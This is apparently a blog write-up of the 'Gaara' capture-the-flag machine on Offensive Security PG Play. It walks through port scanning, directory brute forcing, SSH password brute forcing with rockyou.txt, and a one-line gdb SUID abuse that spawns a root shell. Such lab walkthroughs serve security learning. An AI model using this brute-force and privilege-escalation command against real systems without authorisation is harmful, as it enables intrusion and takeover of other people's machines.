GAARA — Offensive Security PG Play

“Long time, No see…. NARUTO!!..”

We start the enumeration process with a simple Nmap scan:

nmap -p- -sC -sV — open -o nmap.txt $IP

We find port 80 is open and visit it in our browser as a first step and after brute forcing hidden directories we found /Cryoserver. Furthur after static analysis we found three more directories and after reconnaissance we found /iamGaara has some strange string which after decoding with Base58 gave us name and credentials.

It was unsuccessful login to ssh but we got one username. So we brute force ssh and found the credentials for a successful login with wordlist used rockyou.txt

During Post Enumeration I found SUID permission to gdb as shown. So what now?

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor.

Abusing SUIDs to become root:

./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

And we are root with the flag.

That’s all for now,

Until Next Time,

“Stay CHILL” Jutsu!

— — — — — — — — — — — — — — — — — — — — — — — — — —

To reach me out for any query or help:




Cybersecurity | CTFs | Networking |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What Is DeFi Security

{UPDATE} Rally Racer Drift™ Hack Free Resources Generator

7 Mobile Security Tips to Keep Your Phone Safe

Find & Hack Vulnerable Databases With Shodan!

Hack The Box: Popcorn Write-up (#27)

By PARKING in metaverse ZakS87

By PARKING  in metaverse   ZakS87

The Certificate Fashion Show and the Fashion Police

Bloomberg Spy Chips —  Bullshit?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neelesh Patel

Neelesh Patel

Cybersecurity | CTFs | Networking |

More from Medium

Reversing challenge — Trycrackme

Cracking Challenge — TryCrackMe

Decrypting WinRM traffic from AD hashes — HTB Uni Quals 2021 “Keep the Steam Activated” Writeup

Pwnable — FD — Walkthrough